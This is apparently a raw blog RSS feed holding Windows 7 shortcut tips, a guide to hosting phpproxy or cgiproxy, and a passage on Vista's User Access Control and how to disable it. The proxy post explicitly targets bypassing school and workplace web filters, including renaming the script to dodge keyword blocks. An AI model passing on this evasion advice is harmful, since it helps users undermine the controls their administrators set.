24.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Alt + P&lt;/strong&gt;&amp;nbsp;: Show/hide Preview Pane&lt;/div&gt;&lt;h2 style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; font: normal normal normal 2.3em/normal Georgia, 'Times New Roman'; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Taskbar modifiers&lt;/h2&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;25.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Shift + Click&amp;nbsp;&lt;/strong&gt;on icon : Open a new instance&lt;br /&gt;
26.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Middle click&lt;/strong&gt;&amp;nbsp;on icon : Open a new instance&lt;br /&gt;
27.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Ctrl + Shift + Click&lt;/strong&gt;&amp;nbsp;on icon : Open a new instance with Admin privileges&lt;br /&gt;
28.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Shift + Right-click&lt;/strong&gt;&amp;nbsp;on icon : Show window menu (Restore / Minimize / Move / etc).&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Note:&lt;/strong&gt;&amp;nbsp;Normally you can just right-click on the window thumbnail to get this menu.&lt;br /&gt;
29.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Shift + Right-click&lt;/strong&gt;&amp;nbsp;on grouped icon : Menu with Restore All / Minimize All / Close All, etc.&lt;br /&gt;
30.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Ctrl + Click&lt;/strong&gt;&amp;nbsp;on grouped icon : Cycle between the windows (or tabs) in the group&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;br /&gt;
&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Set up your own Proxy Server</title><link>http://0dl.blogspot.com/2010/11/how-to-set-up-your-own-proxy-server.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:16:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-4441978316074032907</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of&lt;a href="http://freshmeat.net/projects/phpproxy/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;phpproxy&lt;/a&gt;&amp;nbsp;or&amp;nbsp;&lt;a href="http://www.jmarshall.com/tools/cgiproxy/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;cgiproxy&lt;/a&gt;&amp;nbsp;depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to&amp;nbsp;&lt;a href="http://www.webhostingsearch.com/advanced-search.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="Find a Web Host"&gt;find a web host&lt;/a&gt;&amp;nbsp;that supports one of the two languages, a good site that I found while searching for those terms might be&amp;nbsp;&lt;a href="http://www.freewebspace.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;freewebspace.net&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. phpproxy&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Download&amp;nbsp;&lt;a href="http://idea.hosting.lv/a/phpproxy/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;phpproxy&lt;/a&gt;&amp;nbsp;and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.&lt;br /&gt;
[eminimall]&lt;br /&gt;
&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. cgiproxy&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;First, download the&amp;nbsp;&lt;a href="http://www.jmarshall.com/tools/cgiproxy/releases/cgiproxy.2.0.1.tar.gz" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;source&lt;/a&gt;&amp;nbsp;and unpack it to a local directory.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like&amp;nbsp;&lt;a href="http://www.whatismyip.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;whatismyip.com&lt;/a&gt;&amp;nbsp;as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;3. What is being blocked&amp;nbsp;&lt;/strong&gt;?&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;a) If you can access the proxy from the client they only block domains / ips.&lt;br /&gt;
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><enclosure length="94523" type="application/x-gzip" url="http://www.jmarshall.com/tools/cgiproxy/releases/cgiproxy.2.0.1.tar.gz"/><itunes:explicit/><itunes:subtitle>Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy ofphpproxy&amp;nbsp;or&amp;nbsp;cgiproxy&amp;nbsp;depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to&amp;nbsp;find a web host&amp;nbsp;that supports one of the two languages, a good site that I found while searching for those terms might be&amp;nbsp;freewebspace.net1. phpproxyDownload&amp;nbsp;phpproxy&amp;nbsp;and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it. You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccessThe php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled. [eminimall] 2. cgiproxyYour hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.First, download the&amp;nbsp;source&amp;nbsp;and unpack it to a local directory.Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like&amp;nbsp;whatismyip.com&amp;nbsp;as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)3. What is being blocked&amp;nbsp;?a) If you can access the proxy from the client they only block domains / ips. b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.</itunes:subtitle><itunes:author>noreply@blogger.com (Unknown)</itunes:author><itunes:summary>Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy ofphpproxy&amp;nbsp;or&amp;nbsp;cgiproxy&amp;nbsp;depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to&amp;nbsp;find a web host&amp;nbsp;that supports one of the two languages, a good site that I found while searching for those terms might be&amp;nbsp;freewebspace.net1. phpproxyDownload&amp;nbsp;phpproxy&amp;nbsp;and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it. You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccessThe php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled. [eminimall] 2. cgiproxyYour hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.First, download the&amp;nbsp;source&amp;nbsp;and unpack it to a local directory.Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like&amp;nbsp;whatismyip.com&amp;nbsp;as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)3. What is being blocked&amp;nbsp;?a) If you can access the proxy from the client they only block domains / ips. b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.</itunes:summary><itunes:keywords>HaCkINg</itunes:keywords></item><item><title>Enabling/Disabling User Access Control in Windows Vist</title><link>http://0dl.blogspot.com/2010/11/enablingdisabling-user-access-control.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:15:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-6473983650135778518</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Microsoft’s advertising has stressed the new security features found in Windows Vista. From the user perspective, one such feature, User Access Control, is arguably the most noticeable enhancement. User access control is a mechanism by which users — even administrators — perform common Windows tasks with non-administrative rights, or as a standard user. Before administrative tasks can be performed, users must actively approve actions that could be potentially dangerous to the computer.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In this article, I’ll give you a complete look at User Access Control’s inner workings and show you some ways you can change the behavior of this new feature.&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;How does User Access Control work?&lt;/strong&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The Inner workings of User Access Control reveal a lot about how this feature protects your computer. First, let’s talk about why User Access Control was developed.&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The problem: Windows XP and silent installations&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In pre-Vista versions of Windows, upon login, a user was assigned an access token. A non-administrative user was assigned a token that granted him access to resources that did not require administrative rights. Users that were members of an administrative group were assigned a single token that granted them full rights to all of the resources on the local computer.&lt;br /&gt;
From an ease-of-use perspective, this level of authority was great. However, from a security perspective, it’s not so great; even for IT pros. Consider the potential for “drive-by” spyware installation. A drive-by installation happens when you visit, either accidentally or intentionally, a site containing malicious code that you don’t know about. While spyware scanners have significantly improved over the past couple of years, there’s not a single solution on the market that will protect against every known threat. Even if there was such a product, there would still be the issue of unknown threats. New spyware pops up every day and it takes vendors time to discover these new nuisances and update their products.&lt;br /&gt;
If you’re logged in to Windows XP as a user with administrative privileges at the time the drive-by takes place, spyware may get installed to your computer with absolutely no notice to you. This spyware could be anything from a fairly innocuous tool to a key logger that keeps track of everything you type and sends the results to a predetermined location. You might end up with the installation of a back door that allows a hacker to make his way into your system at some point in the future to achieve his nefarious goals. Worse, the deeper spyware is embedded into your system, the more difficult it is to remove, short of a complete system rebuild, which can take hours.&lt;/div&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;[eminimall]&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Note:&lt;/strong&gt;&amp;nbsp;When you install Windows XP, the Setup Wizard assigns administrative rights to all local accounts.&lt;br /&gt;
Now, you might tell yourself you already knowall of this; but, in your organization, you’re forced to allow users to run as a local administrator for any number of reasons. For example, many users (with the backing of management) feel it is vital that they have the ability to install new applications on their desktop. Unfortunately, they’re often right. Doing business on the Web often means having to install a new ActiveX control or other type of application. While not the safest behavior, allowing people to do their jobs is preferable to paying people to sit in a chair doing nothing under the unyielding thumb of IT.&lt;br /&gt;
&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;The solution: Windows Vista and User Access Control&lt;/strong&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Vista’s introduction of User Access Control aims to tame this beast and bring some order back to chaos. Under Vista, when an administrative user logs in to the system, he is granted not one, but two access tokens: an administrative access token and a standard user access token. The standard access token is used to start the user’s desktop. The end result is that the administrator is running a system with more limited rights than he would have received upon login under Windows XP. Until there is a need, the second token — the one with administrative rights — is not used.&lt;br /&gt;
This situation takes place, for example, when the administrative user starts a control panel applet and tries to change a setting, Windows Vista’s User Access Control feature pops up a window indicating that permission is necessary to continue. When you choose to allow an administrative action to take place using the administrative token, you are allowing that application to run with&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;elevated&amp;nbsp;&lt;/em&gt;privileges. Figure A gives you a look at a typical User Access Control dialog box. If you want to allow the action, press the Continue button.&lt;br /&gt;
Figure A&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/a_permission.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/a_permission.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;User Access Control asks if you want to proceed with the action.&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;If you’ve seen the Mac v. PC commercials on Apple’s Web site, you’ll recognize this dialog box as being the point of discussion between the PC and the Mac with a security guard standing behind the PC to verify every communication with the Mac. In reality, the situation is not quite that bad. In fact, although annoying from time to time, the situation is much better as the new system provides a visual cue that something is going on and gives a user an opportunity to decline an action.&lt;br /&gt;
Annoyance is one of the results I will try to help you with in this article. I’ll show how you can disable User Access Control altogether, and how to indicate that specific applications should always run in an elevated state.&lt;br /&gt;
&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Completely disabling User Access Control&lt;/strong&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;I’ll preface this section by saying I don’t recommend you take this action, even on your own computer. Much as I am loathe to admit it, even though I preach the dangers of the “blind click” on a pop-up and the resulting spyware that ensues to students and users, I sometimes forget my own advice. Last summer, when I was in a hurry to complete a task, I got what appeared to be a system dialog box and pressed the OK button. Just as I released the mouse button, I realized that the “OK button” I had just pressed was actually a pop-up from a Web site. Just hours later, my system was infested with spyware.&lt;br /&gt;
The lesson here is this: Even those of us that do this for a living fall victim to spyware. With User Access Control, at least there is one more barrier between us and them.&lt;br /&gt;
But, if you find that User Access Control is seriously debilitating, you candisable it and move on. There are a number of ways to disable User Access Control. I’ll show you how to do so using the Control Panel, the Registry Editor, and Group Policy.&lt;br /&gt;
All of the solutions in this article require that you log on as a user with administrative rights. For most solutions, however, you cannot use the local administrator account. This account is not subject to administrative approval. Use another account that is a member of the local administrators group.&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disable User Access Control using MSConfig&lt;/strong&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;For a few machines, you can use MSConfig to change the behavior of User Access Control:&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Go to Start | All Programs | Accessories | Run.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In the Run box, type “msconfig”, and press [Enter].&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;From the System Configuration window, choose the Tools tab, as shown in Figure B.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In the Tool Name column, look for the Disable UAC option.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Press the Launch button.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Reboot the system.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Figure B&lt;br /&gt;
